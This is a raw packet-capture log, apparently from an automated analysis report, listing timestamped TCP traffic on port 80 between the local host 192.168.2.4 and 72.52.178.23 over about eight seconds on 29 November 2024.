                                                                                Nov 29, 2024 01:53:14.666860104 CET804987372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.718936920 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.719141960 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.719151020 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.719196081 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.719301939 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.719316006 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.719383001 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:14.719388008 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.719397068 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.719449043 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:14.719460011 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.719475985 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.719501019 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:14.719516993 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:14.719541073 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.719594002 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:14.719677925 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.719733953 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:14.839375973 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.839386940 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.839436054 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.839479923 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.839554071 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:14.839554071 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:14.881674051 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:14.881772995 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.001662016 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.001749039 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.049772024 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.049932003 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.165935993 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.265707970 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.265764952 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.513645887 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.513699055 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.594921112 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.594988108 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.635118008 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.684561968 CET804987372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.684627056 CET4987380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.684668064 CET4987380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.714972973 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.714986086 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.714996099 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.715121984 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.715133905 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.715254068 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.715284109 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.804578066 CET804987372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.816675901 CET4988080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.833848953 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.833914042 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.833945990 CET4987480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.936630011 CET804988072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:15.940670013 CET4988080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.945132017 CET4988080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:15.955059052 CET804987472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.065618038 CET804988072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.198375940 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.318397999 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.318470001 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.318600893 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.318648100 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.318728924 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.318810940 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.438517094 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438612938 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438637972 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438729048 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.438788891 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438800097 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438857079 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.438894033 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438904047 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438932896 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438942909 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.438951969 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.439012051 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.439049959 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.439060926 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.439064980 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.439114094 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.559031963 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.559045076 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.559098005 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.559111118 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.559135914 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.559168100 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.559190989 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.601815939 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.601974964 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.721752882 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.721837997 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.765700102 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.765758038 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:16.885662079 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:16.885716915 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.045712948 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.045762062 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.102054119 CET804988072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.102127075 CET4988080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.102158070 CET4988080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.206892967 CET4988380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.222053051 CET804988072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.249700069 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.249752045 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.309839010 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.309940100 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.326772928 CET804988372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.326834917 CET4988380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.326968908 CET4988380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.369647026 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430066109 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430102110 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430149078 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430186033 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430267096 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430275917 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.430318117 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.446831942 CET804988372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.550339937 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.550384998 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.550451040 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.670269012 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.707875013 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.828000069 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.828078985 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.828219891 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.828286886 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.828366995 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.828418016 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.948421001 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948539972 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948549986 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948638916 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.948687077 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948697090 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948707104 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948769093 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.948838949 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948847055 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948934078 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.948967934 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948976994 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948985100 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948997021 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.949053049 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.949053049 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.068615913 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.068763971 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.068870068 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.068881989 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.069006920 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.069067001 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.069195032 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.109736919 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.109853029 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.229850054 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.229949951 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.273714066 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.274127960 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.393712044 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.475166082 CET804988372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.479496956 CET4988380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.479757071 CET4988380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.481683016 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.482022047 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.583093882 CET4988980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.599634886 CET804988372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.703219891 CET804988972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.703468084 CET4988980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.703598976 CET4988980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.729672909 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.736809969 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.823477983 CET804988972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.829511881 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.831885099 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.856858969 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.951903105 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.951916933 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.952035904 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.952047110 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.952063084 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.952114105 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.952162027 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.068602085 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.068665028 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.102374077 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.222322941 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.364731073 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.484780073 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.484838963 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.484946966 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.485008955 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.485080957 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.485100031 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.604892969 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605014086 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605066061 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605067968 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605076075 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605119944 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605159044 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605187893 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605210066 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605221033 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605241060 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605248928 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605293036 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605369091 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605416059 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605424881 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605433941 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605475903 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605514050 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605561018 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.725095987 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.725110054 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.725148916 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.725164890 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.725192070 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.725213051 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.725224018 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.769696951 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.769800901 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.885680914 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.885760069 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.887413979 CET804988972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.887473106 CET4988980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.887537003 CET4988980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.933782101 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.934005976 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.956665039 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.003741980 CET4989580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.007972956 CET804988972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.049778938 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.049853086 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.121496916 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.123853922 CET804989572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.124155045 CET4989580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.124274969 CET4989580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.241408110 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.241556883 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.241677999 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.241677999 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.241772890 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.241796970 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.244121075 CET804989572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.362447977 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.364269972 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.364347935 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.364356041 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.364363909 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.364372015 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.364381075 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.364388943 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.364397049 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.364399910 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.364403963 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.364435911 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.364495993 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.364566088 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.364588976 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.484517097 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.484561920 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.484647989 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.484663963 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.484663963 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.484783888 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.525749922 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.525902033 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.645760059 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.652564049 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.689829111 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.690094948 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.810072899 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.810194016 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.973815918 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.973869085 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.177747011 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.177812099 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.232356071 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.232497931 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.297873020 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.308312893 CET804989572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.308379889 CET4989580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.308418989 CET4989580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.352549076 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.352560997 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.352633953 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.352643013 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.352722883 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.352771997 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.425715923 CET4989880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.428395987 CET804989572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.471353054 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.471415997 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.471440077 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.545695066 CET804989872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.545769930 CET4989880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.546031952 CET4989880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.591367960 CET804989772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.665982962 CET804989872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.669168949 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.789424896 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.789490938 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.789654970 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.789705038 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.789781094 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.789805889 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.909571886 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.909687996 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.909722090 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.909800053 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.909809113 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.909882069 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.909938097 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.909949064 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.910020113 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.910020113 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.910049915 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.910058975 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.910156965 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.910202980 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.910202980 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.910211086 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:21.910243988 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:21.910243988 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.029936075 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.029946089 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.029992104 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.030021906 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.030077934 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.030121088 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.030165911 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.073848963 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.074131012 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.194226980 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.194314957 CET4989980192.168.2.472.52.178.23
